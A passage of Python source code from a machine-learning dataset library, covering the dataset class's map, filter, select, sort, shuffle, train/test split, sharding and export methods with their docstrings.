input_dataset = self.with_format( self._format_type, columns=input_columns, output_all_columns=False, **self._format_kwargs ) if remove_columns: remove_columns = list(set(remove_columns) & set(input_columns)) else: input_dataset = self # Loop over single examples or batches and write to buffer/file if examples are to be updated pbar_iterable = input_dataset if not batched else range(0, len(input_dataset), batch_size) pbar_unit = "ex" if not batched else "ba" pbar_desc = (desc or "") + " #" + str(rank) if rank is not None else desc pbar = utils.tqdm( pbar_iterable, disable=disable_tqdm, position=rank, unit=pbar_unit, desc=pbar_desc, ) if not batched: for 
i, example in enumerate(pbar): example = apply_function_on_filtered_inputs(example, i, offset=offset) if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(example, pa.Table): writer.write_row(example) else: writer.write(example) else: for i in pbar: if drop_last_batch and i + batch_size > input_dataset.num_rows: continue batch = input_dataset._getitem( slice(i, i + batch_size), decoded=False, ) indices = list( range(*(slice(i, i + batch_size).indices(input_dataset.num_rows))) ) # Something simpler? try: batch = apply_function_on_filtered_inputs( batch, indices, check_same_num_examples=len(input_dataset.list_indexes()) > 0, offset=offset, ) except NumExamplesMismatchError: raise DatasetTransformationNotAllowedError( "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." ) from None if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(batch, pa.Table): writer.write_table(batch) else: writer.write_batch(batch) if update_data and writer is not None: writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file except (Exception, KeyboardInterrupt): if update_data: if writer is not None: writer.finalize() if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if update_data and tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(cache_file_name, 0o666 & ~umask) if update_data: # Create new Dataset from buffer or file info = self.info.copy() info.features = writer._features info.task_templates = None if buf_writer is None: return Dataset.from_file(cache_file_name, info=info, split=self.split) else: return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split) else: return self @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name"], version="2.0.1") def filter( self, function: Optional[Callable] = None, with_indices=False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a filter function to all the elements in the table in batches and update the table so that the dataset only includes examples according to the filter function. Args: function (:obj:`Callable`): Callable with one of the following signatures: - ``function(example: Union[Dict, Any]) -> bool`` if ``with_indices=False, batched=False`` - ``function(example: Union[Dict, Any], indices: int) -> bool`` if ``with_indices=True, batched=False`` - ``function(example: Union[Dict, Any]) -> List[bool]`` if ``with_indices=False, batched=True`` - ``function(example: Union[Dict, Any], indices: int) -> List[bool]`` if ``with_indices=True, batched=True`` If no function is provided, defaults to an always True function: ``lambda x: True``. 
with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`. input_columns (:obj:`str` or `List[str]`, optional): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (:obj:`int`, optional, default `1000`): Number of examples per batch provided to `function` if ``batched = True``. If ``batched = False``, one example per batch is passed to ``function``. If ``batch_size <= 0`` or ``batch_size == None``: provide the full dataset as a single batch to `function` keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. fn_kwargs (:obj:`dict`, optional): Keyword arguments to be passed to `function` num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. suffix_template (:obj:`str`): If `cache_file_name` is specified, then this suffix will be added at the end of the base name of each. For example, if `cache_file_name` is `"processed.arrow"`, then for ``rank = 1`` and ``num_proc = 4``, the resulting file would be `"processed_00001_of_00004.arrow"` for the default suffix (default `_{rank:05d}_of_{num_proc:05d}`) new_fingerprint (:obj:`str`, optional): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while filtering examples. """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.filter` on a dataset with attached indexes is not allowed. 
You can first run `.drop_index()` to remove your index and then re-add it."
            )

        if function is None:
            function = lambda x: True  # noqa: E731

        if remove_columns is not None:
            raise ValueError("Parameter `remove_columns` passed to .filter() is no longer supported.")

        indices = self.map(
            function=partial(
                get_indices_from_mask_function, function, batched, with_indices, input_columns, self._indices
            ),
            with_indices=True,
            features=Features({"indices": Value("uint64")}),
            batched=True,
            batch_size=batch_size,
            remove_columns=self.column_names,
            keep_in_memory=keep_in_memory,
            load_from_cache_file=load_from_cache_file,
            cache_file_name=cache_file_name,
            writer_batch_size=writer_batch_size,
            fn_kwargs=fn_kwargs,
            num_proc=num_proc,
            suffix_template=suffix_template,
            new_fingerprint=new_fingerprint,
            input_columns=input_columns,
            desc=desc,
        )
        new_dataset = copy.deepcopy(self)
        new_dataset._indices = indices.data
        new_dataset._fingerprint = new_fingerprint
        return new_dataset

    @transmit_format
    @fingerprint_transform(inplace=False, ignore_kwargs=["cache_file_name"])
    def flatten_indices(
        self,
        keep_in_memory: bool = False,
        cache_file_name: Optional[str] = None,
        writer_batch_size: Optional[int] = 1000,
        features: Optional[Features] = None,
        disable_nullable: bool = False,
        new_fingerprint: Optional[str] = None,
    ) -> "Dataset":
        """Create and cache a new Dataset by flattening the indices mapping.

        Args:
            keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file.
            cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the
                results of the computation instead of the automatically generated cache file name.
            writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer.
                This value is a good trade-off between memory usage during the processing, and processing speed.
                A higher value makes the processing do fewer lookups, a lower value consumes less temporary memory while running `.map()`.
            features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file
                instead of the automatically generated one.
            disable_nullable (:obj:`bool`, default `False`): Disallow null values in the table.
            new_fingerprint (`Optional[str]`, default `None`): The new fingerprint of the dataset after transform.
                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments.
        """
        return self.map(
            batched=True,  # for speed
            keep_in_memory=keep_in_memory,
            cache_file_name=cache_file_name,
            writer_batch_size=writer_batch_size,
            features=features,
            disable_nullable=disable_nullable,
            new_fingerprint=new_fingerprint,
            desc="Flattening the indices",
        )

    def _new_dataset_with_indices(
        self,
        indices_cache_file_name: Optional[str] = None,
        indices_buffer: Optional[pa.Buffer] = None,
        fingerprint: Optional[str] = None,
    ) -> "Dataset":
        """Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the
        current Dataset.
""" if indices_cache_file_name is None and indices_buffer is None: raise ValueError("At least one of indices_cache_file_name or indices_buffer must be provided.") if fingerprint is None: raise ValueError("please specify a fingerprint for the dataset with indices") if indices_cache_file_name is not None: indices_table = MemoryMappedTable.from_file(indices_cache_file_name) else: indices_table = InMemoryTable.from_buffer(indices_buffer) # Return new Dataset object # don't forget to copy the objects return Dataset( self._data, info=self.info.copy(), split=self.split, indices_table=indices_table, fingerprint=fingerprint, ) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["indices_cache_file_name"]) def select( self, indices: Iterable, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset with rows selected following the list/array of indices. Args: indices (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing. keep_in_memory (:obj:`bool`, default `False`): Keep the indices mapping in memory instead of writing it to a cache file. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the indices mapping instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if keep_in_memory and indices_cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `indices_cache_file_name` but not both.") if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.select` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." 
) # If the array is empty we do nothing if len(self) == 0: return self # Prepare the writer for our indices arrow table if keep_in_memory or indices_cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) else: buf_writer = None logger.info(f"Caching indices mapping at {indices_cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(indices_cache_file_name), delete=False) writer = ArrowWriter( path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) indices_array = pa.array(indices, type=pa.uint64()) # Check if we need to convert indices if self._indices is not None: indices_array = self._indices.column(0).take(indices_array) indices_table = pa.Table.from_arrays([indices_array], names=["indices"]) with writer: try: writer.write_table(indices_table) writer.finalize() # close_stream=bool(buf_writer is None)) We only close if we are writing in a file except (Exception, KeyboardInterrupt): if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, indices_cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(indices_cache_file_name, 0o666 & ~umask) # Return new Dataset object if buf_writer is None: return self._new_dataset_with_indices( indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint ) else: return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"]) def sort( self, column: str, reverse: bool = False, kind: str = None, null_placement: str = "last", keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset sorted according to a column. Currently sorting according to a column name uses pandas sorting algorithm under the hood. The column should thus be a pandas compatible type (in particular not a nested type). This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases). Args: column (:obj:`str`): column name to sort by. reverse (:obj:`bool`, default `False`): If True, sort by descending order rather then ascending. kind (:obj:`str`, optional): Pandas algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’}, The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general, the actual implementation will vary with data type. The ‘mergesort’ option is retained for backwards compatibility. null_placement (:obj:`str`, default `last`): Put `None` values at the beginning if ‘first‘; ‘last‘ puts `None` values at the end. .. versionadded:: 1.14.2 keep_in_memory (:obj:`bool`, default `False`): Keep the sorted indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the sorted indices can be identified, use it instead of recomputing. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. 
It is used to store the sorted indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. Higher value gives smaller cache files, lower value consume less temporary memory. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Check the column name if not isinstance(column, str) or column not in self._data.column_names: raise ValueError( f"Column '{column}' not found in the dataset. Please provide a column selected in: {self._data.column_names}" ) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached sorted indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) column_data = self._getitem( column, format_type="pandas", format_columns=None, output_all_columns=False, format_kwargs=None ) df_sorted = column_data.to_frame().sort_values( column, ascending=not reverse, kind=kind, na_position=null_placement ) indices = df_sorted.index.to_numpy() return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"] ) def shuffle( self, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new Dataset where the rows are shuffled. Currently shuffling uses numpy random generators. You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64). Args: seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the shuffled indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the shuffled indices can be identified, use it instead of recomputing. 
indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the shuffled indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (:obj:`str`, optional, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self if seed is not None and generator is not None: raise ValueError("Both `seed` and `generator` were provided. Please specify just one of them.") if generator is not None and not isinstance(generator, np.random.Generator): raise ValueError("The provided generator must be an instance of numpy.random.Generator") if generator is None: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached shuffled indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) permutation = generator.permutation(len(self)) return self.select( indices=permutation, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, fingerprint_names=["train_new_fingerprint", "test_new_fingerprint"], ignore_kwargs=["load_from_cache_file", "train_indices_cache_file_name", "test_indices_cache_file_name"], ) def train_test_split( self, test_size: Union[float, int, None] = None, train_size: Union[float, int, None] = None, shuffle: bool = True, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, train_indices_cache_file_name: Optional[str] = None, test_indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, train_new_fingerprint: Optional[str] = None, test_new_fingerprint: Optional[str] = None, ) -> "DatasetDict": """Return a dictionary (:obj:`datasets.DatsetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits). Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`. This method is similar to scikit-learn `train_test_split` with the omission of the stratified options. 
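        A minimal usage sketch (the dataset name, split size and seed below are illustrative only):

        .. code-block:: python

            >>> ds = datasets.load_dataset("rotten_tomatoes", split="train")
            >>> splits = ds.train_test_split(test_size=0.1, seed=42)
            >>> train_ds, test_ds = splits["train"], splits["test"]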
Args: test_size (:obj:`numpy.random.Generator`, optional): Size of the test split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is set to the complement of the train size. If train_size is also None, it will be set to 0.25. train_size (:obj:`numpy.random.Generator`, optional): Size of the train split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. shuffle (:obj:`bool`, optional, default `True`): Whether or not to shuffle the data before splitting. seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the splits indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the splits indices can be identified, use it instead of recomputing. train_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the train split indices instead of the automatically generated cache file name. test_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the test split indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. train_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the train set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments test_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the test set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ from .dataset_dict import DatasetDict # import here because of circular dependency if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.train_test_split` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return DatasetDict({"train": self, "test": self}) if test_size is None and train_size is None: test_size = 0.25 # Safety checks similar to scikit-learn's ones. 
# (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750) n_samples = len(self) if ( isinstance(test_size, int) and (test_size >= n_samples or test_size <= 0) or isinstance(test_size, float) and (test_size <= 0 or test_size >= 1) ): raise ValueError( f"test_size={test_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if ( isinstance(train_size, int) and (train_size >= n_samples or train_size <= 0) or isinstance(train_size, float) and (train_size <= 0 or train_size >= 1) ): raise ValueError( f"train_size={train_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if train_size is not None and not isinstance(train_size, (int, float)): raise ValueError(f"Invalid value for train_size: {train_size} of type {type(train_size)}") if test_size is not None and not isinstance(test_size, (int, float)): raise ValueError(f"Invalid value for test_size: {test_size} of type {type(test_size)}") if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1: raise ValueError( f"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)" " range. Reduce test_size and/or train_size." ) if isinstance(test_size, float): n_test = ceil(test_size * n_samples) elif isinstance(test_size, int): n_test = float(test_size) if isinstance(train_size, float): n_train = floor(train_size * n_samples) elif isinstance(train_size, int): n_train = float(train_size) if train_size is None: n_train = n_samples - n_test elif test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError( f"The sum of train_size and test_size = {n_train + n_test}, " "should be smaller than the number of " f"samples {n_samples}. Reduce test_size and/or " "train_size." ) n_train, n_test = int(n_train), int(n_test) if n_train == 0: raise ValueError( f"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the " "resulting train set will be empty. Adjust any of the " "aforementioned parameters." 
) if generator is None and shuffle is True: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if train_indices_cache_file_name is None or test_indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args if train_indices_cache_file_name is None: train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint) if test_indices_cache_file_name is None: test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint) if ( os.path.exists(train_indices_cache_file_name) and os.path.exists(test_indices_cache_file_name) and load_from_cache_file ): logger.warning( f"Loading cached split indices for dataset at {train_indices_cache_file_name} and {test_indices_cache_file_name}" ) return DatasetDict( { "train": self._new_dataset_with_indices( fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name ), "test": self._new_dataset_with_indices( fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name ), } ) if not shuffle: train_indices = np.arange(n_train) test_indices = np.arange(n_train, n_train + n_test) else: # random partition permutation = generator.permutation(len(self)) test_indices = permutation[:n_test] train_indices = permutation[n_test : (n_test + n_train)] train_split = self.select( indices=train_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=train_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=train_new_fingerprint, ) test_split = self.select( indices=test_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=test_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=test_new_fingerprint, ) return DatasetDict({"train": train_split, "test": test_split}) def shard( self, num_shards: int, index: int, contiguous: bool = False, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, ) -> "Dataset": """Return the `index`-nth shard from dataset split into `num_shards` pieces. This shards deterministically. dset.shard(n, i) will contain all elements of dset whose index mod n = i. dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks, so it can be easily concatenated back together after processing. If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i). `datasets.concatenate([dset.shard(n, i, contiguous=True) for i in range(n)])` will return a dataset with the same order as the original. Be sure to shard before using any randomizing operator (such as shuffle). It is best if the shard operator is used early in the dataset pipeline. Args: num_shards (:obj:`int`): How many shards to split the dataset into. index (:obj:`int`): Which shard to select and return. contiguous: (:obj:`bool`, default `False`): Whether to select contiguous blocks of indices for shards. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. 
It is used to store the indices of each shard instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. """ if not 0 <= index < num_shards: raise ValueError("index should be in [0, num_shards-1]") if contiguous: div = len(self) // num_shards mod = len(self) % num_shards start = div * index + min(index, mod) end = start + div + (1 if index < mod else 0) indices = np.arange(start, end) else: indices = np.arange(index, len(self), num_shards) return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, ) def export( self, filename: str, format: str = "tfrecord", ): """Writes the Arrow dataset to a TFRecord file. The dataset must already be in tensorflow format. The records will be written with keys from `dataset._format_columns`. Args: filename (:obj:`str`): The filename, including the `.tfrecord` extension, to write to. format (`str`, optional, default `"tfrecord"`): The type of output file. Currently this is a no-op, as TFRecords are the only option. This enables a more flexible function signature later. """ try: import tensorflow as tf # noqa: F401 except ImportError: logger.error("Tensorflow needs to be installed to be able to return Tensorflow tensors.") # From https://www.tensorflow.org/tutorials/load_data/tfrecord def _bytes_feature(values): """Returns a bytes_list from a list of string / byte.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=values)) def _float_feature(values): """Returns a float_list from a list of float / double.""" return tf.train.Feature(float_list=tf.train.FloatList(value=values)) def _int64_feature(values): """Returns an int64_list from a list of bool / enum / int / uint.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=values)) def _feature(values: Union[float, int, str, np.ndarray]) -> "tf.train.Feature": """Typechecks `values` and returns the corresponding tf.train.Feature.""" if isinstance(values, np.ndarray): if values.dtype == np.dtype(float): return _float_feature(values) elif values.dtype == np.int64: return _int64_feature(values) elif values.dtype == np.dtype(str) or ( values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str) ): return _bytes_feature([v.encode() for v in values]) else: raise ValueError( f"values={values} is an np.ndarray with items of dtype {values[0].dtype}, which cannot be serialized" ) if hasattr(values, "dtype"): if np.issubdtype(values.dtype, np.floating): return _float_feature([values.item()]) elif np.issubdtype(values.dtype, np.integer): return _int64_feature([values.item()]) elif np.issubdtype(values.dtype, np.str): return _bytes_feature([values.item().encode()]) else: raise ValueError(f"values={values} has dtype {values.dtype}, which cannot be serialized") else: raise ValueError(f"values={values} are not numpy objects, and so cannot be serialized") def serialize_example(ex): feature = {key: _feature(value) for key, value in ex.items()} example_proto = tf.train.Example(features=tf.train.Features(feature=feature)) return example_proto.SerializeToString() def tf_serialize_example(ex): tf_string = tf.py_function(serialize_example, (ex,), tf.string) return 
tf.reshape(tf_string, ()) def generator(): for ex in self: yield serialize_example(ex) if self._format_type != "numpy": raise ValueError("Dataset format must be numpy before exporting") if not filename.endswith(".tfrecord"): raise ValueError("filename {filename} must end with .tfrecord") tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=()) writer = tf.data.experimental.TFRecordWriter(filename) logger.info(f"Writing TFRecord to {filename}") writer.write(tf_dataset) logger.info(f"Finished writing TFRecord to {filename}") self = None # delete the dataset reference used by tf_dataset def to_csv( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_csv_kwargs, ) -> int: """Exports the dataset to csv Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. to_csv_kwargs: Parameters to pass to pandas's :func:`pandas.DataFrame.to_csv` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetWriter return CsvDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_csv_kwargs).write() def to_dict(self, batch_size: Optional[int] = None, batched: bool = False) -> Union[dict, Iterator[dict]]: """Returns the dataset as a Python dict. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `dict` or `Iterator[dict]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pydict() else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pydict() for offset in range(0, len(self), batch_size) ) def to_json( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_json_kwargs, ) -> int: """Export the dataset to JSON Lines or JSON. Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (:obj:`int`, optional): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. lines (:obj:`bool`, default ``True``): Whether output JSON lines format. Only possible if ``orient="records"`. 
